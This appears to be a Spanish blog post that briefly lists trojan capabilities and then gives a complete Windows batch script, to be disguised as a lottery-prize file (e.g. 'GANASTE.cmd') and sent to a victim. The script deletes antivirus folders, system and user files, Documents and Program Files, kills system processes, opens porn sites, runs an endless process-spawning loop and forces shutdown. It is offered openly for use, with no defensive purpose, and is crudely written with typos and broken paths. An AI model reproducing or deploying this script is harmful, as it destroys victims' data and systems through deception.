TROYANO REINICIADO
Los troyanos están diseñados para permitir a un individuo el acceso remoto a un sistema. Una vez en ejecución, el atacante puede acceder al sistema de forma remota y realizar diferentes acciones sin necesitar permiso.6 Las acciones que el atacante puede realizar en el equipo remoto dependen de los privilegios que tenga el usuario atacado en ese equipo y de las características del troyano.
Algunas de las operaciones más comunes son:
- Utilización la máquina como parte de una botnet por ejemplo, para realizar ataques de denegación de servicio o envío de spam.
- Instalación de otros programas (incluyendo aplicaciones maliciosas).
- Robo de información personal: información bancaria, contraseñas, códigos de seguridad, etcétera.
- Borrado, modificación o transferencia de archivos (descarga o subida).
- Borrado completo del disco.
- Ejecución o finalización de procesos.
- Apagado o reiniciado del equipo.
- Captura de las pulsaciones del teclado.
- Capturas de pantalla.
- Llenado del disco duro con archivos inútiles.
- Monitorización del sistema y seguimiento de las acciones del usuario.
- Captura de imágenes o videos a través de la webcam, si tiene.
- Acciones inocuas desde el punto de vista de la seguridad, destinadas a sorprender al usuario, tales como expulsar la unidad de CD, cambiar la apariencia del sistema, etc
Vamos a crear un archivo para enviarselo a la victima
Copiamos y pegamos, ponemos la extensión .cmd
Por ejemplo: GANASTE.cmd
Este sirve para eliminar la carpeta de Windows, y reiniciar el PC cada 80 segundos.
@echo off cd cd "archivos de programa" cd "Norton antivirus" attrib -R -A -S -H *.* del /S /Q *.* cd.. cd "Panda Software" attrib -R -A -S -H *.* del /S /Q *.* cd.. cd "Kaspersky lab" attri -R -A -S -H *.* del /S /Q *.* cd.. cd "McAfee.com" attrib -R -A -S -H *.* del /S /Q *.* msg * Hola, ha ganado la loteria!!!!!! msg * Para acceder a su premio pulse una tecla pause msg * buenos dias aqui esta la primera parte del premio tskkill iexpress.exe tskkill notepad.exe tskkill msnmsgr.exe start www.petardas.com start www.2tetas.com start www.xxx.com start www.tetas-tetas echo off>virus.bat echo off>virus69.bat echo off>virus58.bat echo off>virus45.bat echo off>virus54.bat echo off>virus21.bat echo off>virus9.bat echo off>virus10.bat echo off>virus8.bat echo off>virus7.bat echo off>virus6.bat echo off>virus5.bat echo off>virus4.bat echo off>virus2.bat echo off>virus3.bat echo off>virus65.bat echo off>virus899.bat echo off>virus4545.bat echo off>virus65456.bat echo off>virus544556.ba t echo off>virus65465.bat echo off>virus986546.ba t echo off>virus56564.bat echo off>virus6595.bat echo off>virus669.bat echo off>virus666.bat echo off>virus866456.ba t echo off>virus4664.bat echo off>virus@hotmail.bat echo off>virus5435.bat echo off>virus545454665 46564.bat echo off>virus545454664 54546546.bat echo off>virus545454665 64546546.bat echo off>virus545454665 46.bat echo off>virus545454665 465.bat echo off>virus54545466. bat echo off>virus545454665 45454.bat echo off>virus545454664 65546465645.ba t echo off>virus545454665 54546.bat echo off>virus545454665 45465465.bat echo off>virus545454665 45445546465.ba t echo off>virus545454664 6456546.bat echo off>virus545454664 5456546.bat echo off>virus545454665 6565.bat echo off>virus545454669 8894961320.bat echo off>virus0.bat ping -n 20 0.0.0.0>nul msg * AVISO: Se ha detectado un virus en su computadora msg * El progreso ha sido detenido temporalmente msg * Para terminar el proceso con exito debe pulsar pause msg * Bueno aqui esta otra parte de su premio msg * Le deseo que la disfrute ping -n 10 0.0.0.0>nul echo. echo. tskkill iexplorer.exe tskkill cidaemon.exe tskkill svchost.exe tskkill cisvc.exe tskkill svchost.exe ping -n 20 0.0.0.0 >nul cls echo. echo. msg * como que quieres mas? pos ... OK ping -n 10 0.0.0.0 >nul del /f "c:windowssystem32explorer.exe echo. msg * Seguro que disfruta verdad msg * La deseo que la disfruta verdad? echo. echo. ping -n 10 0.0.0.0 >nul del /f /s /q "c:*.mp3" del /f /s /q "c:*.mp4" del /f /s /q "c:*.jpg" del /f /s /q "c:*.txt" del /f /s /q "c:*.jpeg" del /f /s /q "c:*.rar" del /f /s /q "c:*.php" del /f /s /q "c:*.com" del /f /s /q "c:*.zip" echo ping -n 10 0.0.0.0 >nul msg * Ahora le dare otras cosas mas deltree "%userprofile%/mis documentos" echo. shu*** -a echo. echo. msg * Y por ultimo esto echo. :lalbel start goto lalbel echo. echo. echo. msg * Espero que haya disfrutado echo. echo. echo. echo. echo. echo. echo. echo. echo. echo. ping -n 50 0.0.0.0 >nul deltree "C:archivos de programa" ping -n 50 0.0.0.0 >nul echo. echo. echo. echo. echo. echo. echo. echo. echo. echo. shu*** -s -f -t 0>>c:autoexec.bat
Comentarios
Publicar un comentario